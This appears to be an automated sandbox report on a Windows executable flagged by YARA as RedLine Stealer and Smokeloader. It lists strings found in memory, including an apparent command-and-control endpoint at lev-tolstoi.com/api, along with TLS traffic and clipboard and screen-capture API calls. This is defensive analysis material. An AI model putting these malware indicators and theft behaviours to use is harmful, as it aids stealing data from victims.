Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.stn
Source: H1iOI9vWfh.exe, 00000000.00000003.2428659304.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000002.2616110250.0000000003055000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: H1iOI9vWfh.exe, 00000000.00000003.2479722797.0000000003063000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2506419676.0000000003063000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2479385412.0000000003061000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2480204785.0000000003061000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000002.2616171752.0000000003063000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000002.2616110250.0000000003055000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2506606942.0000000003063000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: H1iOI9vWfh.exe, 00000000.00000003.2479722797.0000000003063000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2506419676.0000000003063000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2479385412.0000000003061000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2480204785.0000000003061000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000002.2616171752.0000000003063000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2506606942.0000000003063000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api1?oc%
Source: H1iOI9vWfh.exe, 00000000.00000003.2506419676.0000000003063000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apij?Vc
Source: H1iOI9vWfh.exe, 00000000.00000002.2616110250.0000000003055000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apim
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steamp.
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaizedN
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900O
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: H1iOI9vWfh.exe, 00000000.00000003.2481098837.0000000003343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: H1iOI9vWfh.exe, 00000000.00000003.2481098837.0000000003343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptc
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: H1iOI9vWfh.exe, 00000000.00000003.2481003624.000000000309E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: H1iOI9vWfh.exe, 00000000.00000003.2481098837.0000000003343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
Source: H1iOI9vWfh.exe, 00000000.00000003.2481098837.0000000003343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
Source: H1iOI9vWfh.exe, 00000000.00000003.2481098837.0000000003343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: H1iOI9vWfh.exe, 00000000.00000003.2481098837.0000000003343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.12:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.12:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.12:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.12:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.12:49718 version: TLS 1.2

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Code function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_004310D0

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Code function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_004310D0

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Code function: 0_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

0_2_00431839

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2615507633.0000000000BCA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004210E0	0_2_004210E0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004361E0	0_2_004361E0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00415298	0_2_00415298
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0040B44C	0_2_0040B44C
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00408790	0_2_00408790
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00426054	0_2_00426054
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043B068	0_2_0043B068
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00414070	0_2_00414070
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043C020	0_2_0043C020
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00439830	0_2_00439830
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043D830	0_2_0043D830
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041B0E1	0_2_0041B0E1
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041F0E0	0_2_0041F0E0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00435890	0_2_00435890
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00434098	0_2_00434098
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043D0A0	0_2_0043D0A0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004180A9	0_2_004180A9
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0040A940	0_2_0040A940
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041714B	0_2_0041714B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0040C917	0_2_0040C917
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0042B12C	0_2_0042B12C
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0042F130	0_2_0042F130
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0042B1C0	0_2_0042B1C0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041D9E0	0_2_0041D9E0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004111E5	0_2_004111E5
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004059F0	0_2_004059F0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004239F2	0_2_004239F2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043C1F0	0_2_0043C1F0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0040F9FD	0_2_0040F9FD
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00425990	0_2_00425990
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043B9A1	0_2_0043B9A1
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00406250	0_2_00406250
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041D270	0_2_0041D270
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00424A74	0_2_00424A74
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00409230	0_2_00409230
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00423A34	0_2_00423A34
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004192DA	0_2_004192DA
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043D2F0	0_2_0043D2F0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043C280	0_2_0043C280
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004082AE	0_2_004082AE
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004252BA	0_2_004252BA
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041CB05	0_2_0041CB05
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00428BC0	0_2_00428BC0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004143C2	0_2_004143C2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00402BD0	0_2_00402BD0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00428BE9	0_2_00428BE9
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00437399	0_2_00437399
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004393A0	0_2_004393A0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00416BA5	0_2_00416BA5
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004293AA	0_2_004293AA
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004223B8	0_2_004223B8
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00436C00	0_2_00436C00
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00423410	0_2_00423410
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0042B4FC	0_2_0042B4FC
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00404CB0	0_2_00404CB0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004074B0	0_2_004074B0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041DD50	0_2_0041DD50
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00418578	0_2_00418578
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0042D57E	0_2_0042D57E
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00424502	0_2_00424502
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00421D10	0_2_00421D10
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0040DD25	0_2_0040DD25
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041D5E0	0_2_0041D5E0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00417582	0_2_00417582
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043D580	0_2_0043D580
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00427DA2	0_2_00427DA2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004205B0	0_2_004205B0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0042C64A	0_2_0042C64A
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00426E50	0_2_00426E50
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0042B4F7	0_2_0042B4F7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043462A	0_2_0043462A
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00435630	0_2_00435630
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004066E0	0_2_004066E0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0042C6E4	0_2_0042C6E4
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00430EF0	0_2_00430EF0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004256F9	0_2_004256F9
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00422E93	0_2_00422E93
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00425E90	0_2_00425E90
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_004156A0	0_2_004156A0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041BEA0	0_2_0041BEA0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00438EA0	0_2_00438EA0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00435EA0	0_2_00435EA0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00405EB0	0_2_00405EB0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041C6BB	0_2_0041C6BB
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00415F66	0_2_00415F66
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00419770	0_2_00419770
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00409700	0_2_00409700
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0042C726	0_2_0042C726
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0042C735	0_2_0042C735
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041DF80	0_2_0041DF80
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00402FA0	0_2_00402FA0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009BC0E8	0_2_009BC0E8
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009D8009	0_2_009D8009
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CC1AC	0_2_009CC1AC
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CE1E7	0_2_009CE1E7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B6117	0_2_009B6117
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009D8108	0_2_009D8108
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E9107	0_2_009E9107
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E6107	0_2_009E6107
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E1157	0_2_009E1157
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009EB2CF	0_2_009EB2CF
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E42FF	0_2_009E42FF
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B3207	0_2_009B3207
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009DF397	0_2_009DF397
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009DB393	0_2_009DB393
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009C73B2	0_2_009C73B2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B83C7	0_2_009B83C7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009ED307	0_2_009ED307
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CB348	0_2_009CB348
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009C734A	0_2_009C734A
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009D1347	0_2_009D1347
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CF347	0_2_009CF347
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B9497	0_2_009B9497
